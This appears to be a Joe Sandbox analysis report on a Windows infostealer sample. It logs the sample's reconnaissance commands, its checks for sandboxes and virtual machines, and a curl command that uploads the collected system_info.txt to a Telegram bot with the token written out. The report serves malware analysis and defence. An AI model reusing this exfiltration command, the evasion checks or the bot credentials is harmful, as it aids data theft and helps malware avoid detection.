                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:16:43:59
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" baseboard get serialnumber
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:16:43:59
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:16:43:59
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" cpu get name
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:16:43:59
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:16:44:00
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" computersystem get totalphysicalmemory
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:16:44:00
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:16:44:01
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" diskdrive get model,size
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:16:44:01
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:16:44:02
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:16:44:02
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:16:44:03
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\getmac.exe
                                          Wow64 process (32bit):false
                                          Commandline:"getmac"
                                          Imagebase:0x7ff7fadd0000
                                          File size:90'112 bytes
                                          MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:16:44:03
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:16
                                          Start time:16:44:04
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\systeminfo.exe
                                          Wow64 process (32bit):false
                                          Commandline:"systeminfo"
                                          Imagebase:0x7ff796d80000
                                          File size:110'080 bytes
                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:17
                                          Start time:16:44:04
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:18
                                          Start time:16:44:04
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m sbiedll.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:19
                                          Start time:16:44:04
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:20
                                          Start time:16:44:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m dbghelp.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:21
                                          Start time:16:44:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:22
                                          Start time:16:44:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m api_log.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:23
                                          Start time:16:44:06
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:24
                                          Start time:16:44:07
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m dir_watch.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:25
                                          Start time:16:44:07
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:26
                                          Start time:16:44:07
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m pstorec.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:27
                                          Start time:16:44:07
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:28
                                          Start time:16:44:08
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m vmcheck.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:29
                                          Start time:16:44:08
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:30
                                          Start time:16:44:09
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m wpespy.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:31
                                          Start time:16:44:09
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:32
                                          Start time:16:44:09
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" computersystem get model
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:33
                                          Start time:16:44:09
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:34
                                          Start time:16:44:10
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:35
                                          Start time:16:44:10
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:36
                                          Start time:16:44:10
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /fi "IMAGENAME eq vboxservice.exe"
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:37
                                          Start time:16:44:10
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:38
                                          Start time:16:44:11
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /fi "IMAGENAME eq vboxtray.exe"
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:39
                                          Start time:16:44:11
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:40
                                          Start time:16:44:11
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" csproduct get identifyingnumber
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:41
                                          Start time:16:44:11
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:44
                                          Start time:16:44:19
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:45
                                          Start time:16:45:12
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\curl.exe
                                          Wow64 process (32bit):false
                                          Commandline:"curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
                                          Imagebase:0x7ff654820000
                                          File size:530'944 bytes
                                          MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:46
                                          Start time:16:45:12
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Executed Functions

                                            Function 00007FF7B90318F0 Relevance: 87.3, APIs: 40, Strings: 8, Instructions: 3341COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$CloseFreeHandle
                                            • String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NUL\cmd.exemaximum number of ProcThreadAttributes exceeded
                                            • API String ID: 1070102993-4160752474
                                            • Opcode ID: e0e4134bb13c93bb1cb2ae8ca2a83206a7417c017054b62f519f36f622cae1c7
                                            • Instruction ID: 4612318126273ee75c259bf035c9f153c0198a248e307befcd49039fbc82166e
                                            • Opcode Fuzzy Hash: e0e4134bb13c93bb1cb2ae8ca2a83206a7417c017054b62f519f36f622cae1c7
                                            • Instruction Fuzzy Hash: 0F73A462A18AD389EB709F29DD503F96371FB2A789F804135DB6D4BB99DF38D2418310
                                            Function 00007FF7B9012720 Relevance: 31.2, APIs: 1, Strings: 18, Instructions: 2749COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: /ficsproductidentifyingnumber$12345678$1RLV$COMPUTERNAMEComputer Name: $F0CF008J$L1HF0CF0$USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel$a Display implementation returned an error unexpectedly/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs$ed.$getmacMAC Address: $nown$ormation$sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA$system_info.txtFailed to write to file: $systeminfoSystem Info: $tected.$wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq $x DLLs:
                                            • API String ID: 0-225615594
                                            • Opcode ID: c42897ccc4d9aed1fb04b667ccb191a2c2fb66f9d5a861493744c592ca57521d
                                            • Instruction ID: 8aa1ac83b3ff1e56278832421f402ede3ba0b33dec2634d2f31141924ad0d9e7
                                            • Opcode Fuzzy Hash: c42897ccc4d9aed1fb04b667ccb191a2c2fb66f9d5a861493744c592ca57521d
                                            • Instruction Fuzzy Hash: 51733472605BD289EB719F28D8803E963B5FB56B88F804125DB5C4BB99EF39D384C310
                                            Function 00007FF7B902FDF0 Relevance: 8.0, APIs: 5, Instructions: 503COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2213 7ff7b902fdf0-7ff7b902fe53 2214 7ff7b902fe60-7ff7b902fe73 GetCurrentProcessId 2213->2214 2215 7ff7b902fe75 2214->2215 2216 7ff7b902fea6-7ff7b902ff3a call 7ff7b9042200 2214->2216 2217 7ff7b902fe80-7ff7b902fea4 ProcessPrng 2215->2217 2220 7ff7b902ff4d-7ff7b902ff7d 2216->2220 2221 7ff7b902ff3c-7ff7b902ff48 call 7ff7b901a130 2216->2221 2217->2216 2217->2217 2223 7ff7b902ff7f-7ff7b902ff8a 2220->2223 2224 7ff7b902ffa0-7ff7b902ffbd 2220->2224 2221->2220 2225 7ff7b902ff8c-7ff7b902ff90 2223->2225 2226 7ff7b902ffd0-7ff7b902ffe2 2223->2226 2227 7ff7b9030093-7ff7b90300af call 7ff7b901a120 2224->2227 2228 7ff7b9030034-7ff7b9030039 2225->2228 2229 7ff7b9030028-7ff7b9030031 2226->2229 2230 7ff7b902ffe4-7ff7b902fff6 2226->2230 2236 7ff7b90300b5-7ff7b90300d4 2227->2236 2237 7ff7b90305a3-7ff7b90305cd call 7ff7b904f3f0 2227->2237 2234 7ff7b903003c-7ff7b903007e 2228->2234 2229->2228 2232 7ff7b902fffc-7ff7b9030021 2230->2232 2233 7ff7b90303f4-7ff7b9030405 2230->2233 2232->2228 2238 7ff7b9030023 2232->2238 2233->2228 2241 7ff7b903040b-7ff7b9030434 2233->2241 2239 7ff7b90305a1 2234->2239 2240 7ff7b9030084-7ff7b903008e 2234->2240 2242 7ff7b90300f3-7ff7b90300f9 2236->2242 2246 7ff7b90305d2-7ff7b903060b 2237->2246 2238->2241 2239->2237 2240->2227 2241->2234 2244 7ff7b90300ff-7ff7b9030103 2242->2244 2245 7ff7b90301a0-7ff7b90301a5 2242->2245 2247 7ff7b9030160-7ff7b9030167 2244->2247 2248 7ff7b9030105-7ff7b903010b 2244->2248 2249 7ff7b90301ab-7ff7b90301b3 2245->2249 2250 7ff7b9030340-7ff7b9030388 CreateNamedPipeW 2245->2250 2251 7ff7b903060d-7ff7b903061d call 7ff7b901a130 2246->2251 2252 7ff7b9030622-7ff7b903065b 2246->2252 2247->2245 2257 7ff7b9030169-7ff7b9030177 2247->2257 2255 7ff7b903010d-7ff7b903014f 2248->2255 2256 7ff7b90300e0-7ff7b90300f0 2248->2256 2258 7ff7b9030230-7ff7b9030236 2249->2258 2259 7ff7b90301b5-7ff7b90301d5 2249->2259 2253 7ff7b903038e-7ff7b90303a5 GetLastError 2250->2253 2254 7ff7b90304a6-7ff7b90304b0 2250->2254 2251->2252 2261 7ff7b9030439-7ff7b9030453 2253->2261 2262 7ff7b90303ab-7ff7b90303b1 2253->2262 2265 7ff7b90304b2-7ff7b90304c1 call 7ff7b901a130 2254->2265 2266 7ff7b90304c6-7ff7b9030535 call 7ff7b902e610 2254->2266 2263 7ff7b90301db-7ff7b903020d 2255->2263 2264 7ff7b9030155 2255->2264 2256->2242 2267 7ff7b903017d-7ff7b9030189 2257->2267 2268 7ff7b903026c-7ff7b9030281 2257->2268 2270 7ff7b903023e 2258->2270 2259->2263 2269 7ff7b9030598 2259->2269 2279 7ff7b9030455-7ff7b9030461 call 7ff7b901a130 2261->2279 2280 7ff7b9030466-7ff7b9030469 2261->2280 2271 7ff7b90303c0-7ff7b90303c3 2262->2271 2272 7ff7b90303b3-7ff7b90303bd 2262->2272 2263->2270 2281 7ff7b903020f-7ff7b9030223 2263->2281 2264->2269 2265->2266 2291 7ff7b903053a-7ff7b903053d 2266->2291 2267->2256 2277 7ff7b903018f 2267->2277 2275 7ff7b90302ca-7ff7b90302e2 2268->2275 2276 7ff7b9030283-7ff7b9030295 2268->2276 2273 7ff7b903059a-7ff7b903059f call 7ff7b904f3f0 2269->2273 2283 7ff7b9030240-7ff7b903025d call 7ff7b9023e00 2270->2283 2271->2261 2288 7ff7b90303c5-7ff7b90303cb 2271->2288 2286 7ff7b90303cd-7ff7b90303d9 2272->2286 2273->2246 2275->2256 2292 7ff7b90302e8 2275->2292 2289 7ff7b9030297-7ff7b90302c2 2276->2289 2290 7ff7b90302ed-7ff7b9030304 2276->2290 2277->2255 2279->2280 2284 7ff7b903046b-7ff7b9030477 call 7ff7b901a130 2280->2284 2285 7ff7b903047c-7ff7b9030480 2280->2285 2281->2283 2309 7ff7b903058e-7ff7b9030596 2283->2309 2310 7ff7b9030263 2283->2310 2284->2285 2296 7ff7b903048b-7ff7b90304a5 2285->2296 2297 7ff7b9030482-7ff7b9030485 CloseHandle 2285->2297 2286->2214 2299 7ff7b90303df-7ff7b90303ef call 7ff7b901a130 2286->2299 2288->2261 2288->2286 2289->2248 2300 7ff7b90302c8 2289->2300 2290->2248 2293 7ff7b903030a-7ff7b9030331 2290->2293 2301 7ff7b903055c-7ff7b9030572 2291->2301 2302 7ff7b903053f-7ff7b9030551 2291->2302 2292->2290 2293->2256 2304 7ff7b9030337 2293->2304 2297->2296 2299->2214 2300->2293 2301->2296 2303 7ff7b9030578-7ff7b9030589 call 7ff7b901a130 2301->2303 2302->2284 2307 7ff7b9030557 2302->2307 2303->2296 2304->2255 2307->2285 2309->2273 2310->2268
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
